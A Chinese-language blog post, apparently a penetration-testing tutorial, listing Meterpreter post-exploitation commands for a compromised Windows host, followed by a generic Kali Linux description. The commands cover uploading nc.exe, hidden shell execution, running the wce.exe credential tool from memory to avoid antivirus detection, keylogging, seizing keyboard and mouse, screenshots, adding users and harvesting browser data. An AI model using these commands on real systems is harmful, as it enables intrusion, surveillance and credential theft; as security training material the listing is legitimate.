[Kali]--Meterpreter深度渗透

Meterpreter深度渗透

通常情况下,meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。

Meterpreter会话下:

  • upload:从kali主机上传到靶机

upload /usr/share/windows-binarier/nc.exe C:\

  • getuid:查看meterpreter的系统运行权限
  • ps:当前正在运行的进程列表
  • download:从靶机下载文件到本机上
  • systeminfo:
  • execute -f notepad.exe:执行程序,加-H可在后台隐秘执行
  • execute -H -i -f cmd.exe:在目标主机上运行cmd程序并以隐藏的方式交互到meterpreter会话上
  • execute -H -m -d notepad.exe -f wce.exe -a “-o wce.txt”:在目标主机内存中直接执行攻击机上的程序,可以避免存储到目标主机上被发现或查杀。
    • -d:傀儡程序,在目标主机执行时显示的进程
    • -m:从内存中执行
    • “-o wce.txt" 是wce.exe的运行参数
    • -a:添加命令的参数
  • edit:调用编辑器,对目标主机上的文件修改,如host文件
  • search -f xxx.bat
  • portfwd:端口转发
  • netstat -an |grep 4444
  • rdesktop -u username -p password:远程桌面
  • route:查看路由表
  • route add:添加路由
  • route print:
  • run get_local_subnets:目标主句的内网IP段
  • arp
  • cat c:\boot.ini
  • 键盘监听:
    • keyscan_start:开启键盘记录
    • keyscan_dump:显示键盘记录
    • keyscan_stop:关闭键盘记录
  • uictl enable keyboard/mouse:接管目标主机的键盘或鼠标
  • getdesktop/screenshot:截图
  • reboot/shutdown
  • reg:与注册表互动
  • shell:获得控制台权限
  • add_user
  • add_group_user
  • 获取敏感信息:
    • run post/windows/gather/checkvm:检查是否虚拟机
    • run post/windows/gather/enum_applications:获取软件安装信息
    • run post/windows/gather/dumplinks:最近的文件操作
    • run post/windows/gather/enum_ie/chrome:获取浏览器缓存
  • 除了Meterpreter命令之外,meterpreter控制台还提供了脚本功能,kali中这里脚本存储在:/usr/share/metasploit-framework/scripts/meterpreter,要执行脚本,使用run [script-name] 命令。
  • 更多命令可以参考:https://www/cnblogs/com/backlion/p/9484949.html
Kali Linux是一个基于Debian的Linux发行版,主要用于渗透测试和网络安全评估。其中Kali-rolling是Kali Linux的滚动发行版,意味着它是一个持续更新的版本,而不是像以前的发行版那样有一个新版本发布。 Kali-rolling作为一个渗透测试工具,提供了丰富的网络安全工具和资源。它包含了各种各样的渗透测试工具,如Metasploit框架、Nmap、Aircrack-ng等。这些工具可以用来评估一个系统的安全性,发现潜在的漏洞和弱点,并提供相应的解决方案。 除了常规的渗透测试工具,Kali-rolling还包含了在网络安全中广泛使用的其他资源,如字典文件、恶意软件样本、渗透测试教程等。这些资源能够帮助渗透测试人员更好地理解和学习渗透测试的技术和方法。 Kali-rolling不仅适用于专业渗透测试人员,也适用于任何对网络安全感兴趣的人。它提供了友好的图形用户界面和易于使用的工具,使用户能够轻松地进行各种渗透测试活动。同时,Kali-rolling还可以用作安全操作系统,用于保护个人计算机或企业网络免受潜在的网络攻击。 总之,Kali-rolling是一个功能强大的渗透测试工具,它提供了一系列网络安全工具和资源,可用于评估和保护计算机系统的安全性。无论是渗透测试专业人员还是网络安全爱好者,都可以从Kali-rolling中受益,并提升他们的技术水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值